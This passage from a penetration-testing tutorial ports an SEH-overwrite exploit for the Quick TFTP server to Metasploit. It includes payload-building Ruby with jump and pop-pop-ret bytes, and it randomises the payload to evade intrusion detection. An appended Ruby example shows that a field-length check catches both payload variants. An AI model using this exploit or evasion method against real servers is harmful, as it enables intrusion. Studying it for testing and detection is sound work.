Porting Exploits to the Metasploit Framework

    sploit = "\x00\x02"
    sploit << "pwnd"
    sploit << "\x00"
    sploit << evil
    sploit << "\x00"

    udp_sock.put(sploit)

    disconnect_udp
  end

Following the initial string of As (1019 of them, represented by \x41 in hexadecimal), we add a short jump at   to overwrite the Next SE Handler (NSEH). At the beginning of this chapter, we used a simple stack overflow example when we attacked MailCarrier and overwrote the instruction pointer. Here, we overwrite the SEH and the NSEH to break out of the structured exception handler. Then at   we add the address of a POP-POP-RETN sequence of instructions to overwrite SEH, which puts us into an area of memory that we control.

Next, to make sure that the packet will be recognized as a write request by the TFTP server, we append \x00\x02 after the shellcode at  .

Now, when we load the module and run it against our target, our debugger should pause with a SEH overwrite, as shown in Figure 15-4.

Figure 15-4: Quick TFTP's initial SEH overwrite

Because that long string of As and the NOP slide sent to the application will set off IDS alarms, we'll replace the As (as in the previous example) with a random selection of uppercase alphabetic characters, and replace the \x90 characters with NOP equivalents, as shown in the following boldface code:

    evil = rand_text_alpha_upper(1019)   # Was: "\x41" * 1019
    evil << "\xeb\x08\x90\x90"           # Short Jump
    evil << "\x58\x14\xd3\x74"           # pop/pop/ret
    evil << make_nops(16)                # Was: "\x90" * 16  # NOP slide
    evil << "\xcc" * 412                 # Dummy Shellcode

As always, it's a good idea to check your new module's functionality after every change. As you can see in Figure 15-5, the random characters have been accepted by the application and SEH is still controlled as it was before.
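The packet layout built above and the randomization step both come down to the same detection question for a defender: a byte-pattern signature on the static As or \x90 bytes fires on the first version but not the second, while decoding the TFTP request and checking the field lengths catches both. The following Ruby is an added example, not code from the book or from the Metasploit module; the 255-byte MAX_FIELD bound, the 64-byte signature threshold and the sample packets are constructed assumptions.

```ruby
# Added example (not from the book or the Metasploit module): a small TFTP
# request parser with the checks a defender would apply to the WRQ packet
# built above. The byte-pattern signature stands in for the IDS alarm the
# text mentions; MAX_FIELD is an assumed sane bound, not a protocol limit.
TFTP_OPCODES = { 1 => "RRQ", 2 => "WRQ" }.freeze
VALID_MODES  = %w[netascii octet mail].freeze
MAX_FIELD    = 255
ALPHA        = ("A".."Z").to_a.freeze

# Parse a TFTP request: 2-byte opcode, NUL-terminated filename, NUL-terminated mode.
# Returns nil for anything that is not an RRQ/WRQ.
def parse_tftp_request(pkt)
  pkt = pkt.b
  return nil if pkt.bytesize < 4
  opcode = pkt.byteslice(0, 2).unpack1("n")
  return nil unless TFTP_OPCODES.key?(opcode)
  filename, mode, _rest = pkt.byteslice(2, pkt.bytesize - 2).split("\x00".b, 3)
  { opcode: TFTP_OPCODES[opcode], filename: filename.to_s, mode: mode.to_s }
end

# Naive signature: the static "A" sled or "\x90" sled that the text says trips IDS.
def naive_signature_hit?(pkt)
  pkt = pkt.b
  pkt.include?("A".b * 64) || pkt.include?("\x90".b * 8)
end

# Field-level check: flags oversized or invalid fields whatever the bytes look like.
def findings_for(pkt)
  req = parse_tftp_request(pkt)
  return ["not a TFTP request"] if req.nil?
  findings = []
  findings << "filename too long (#{req[:filename].bytesize} bytes)" if req[:filename].bytesize > MAX_FIELD
  findings << "mode too long (#{req[:mode].bytesize} bytes)" if req[:mode].bytesize > MAX_FIELD
  findings << "unknown mode #{req[:mode].byteslice(0, 8).inspect}" unless VALID_MODES.include?(req[:mode].downcase)
  findings
end

# Constructed packets mirroring the layout above: the overlong mode field carries the payload.
def build_wrq(mode_payload)
  "\x00\x02".b + "pwnd".b + "\x00".b + mode_payload.b + "\x00".b
end

SEH_CHAIN   = "\xeb\x08\x90\x90".b + "\x58\x14\xd3\x74".b   # short jump + pop/pop/ret bytes from the text
DUMMY_SHELL = "\xcc".b * 412                                # INT3 placeholder, as in the text
STATIC_EVIL = ("A".b * 1019) + SEH_CHAIN + ("\x90".b * 16) + DUMMY_SHELL
rng         = Random.new(1)   # fixed seed so the run is reproducible
RANDOM_EVIL = Array.new(1019) { ALPHA[rng.rand(26)] }.join.b + SEH_CHAIN +
              Array.new(16) { ALPHA[rng.rand(26)] }.join.b + DUMMY_SHELL   # alpha bytes stand in for make_nops(16)
```

Feeding build_wrq(STATIC_EVIL) and build_wrq(RANDOM_EVIL) to naive_signature_hit? and findings_for shows the signature firing only on the static variant, while the field-length check reports the 1455-byte mode field in both.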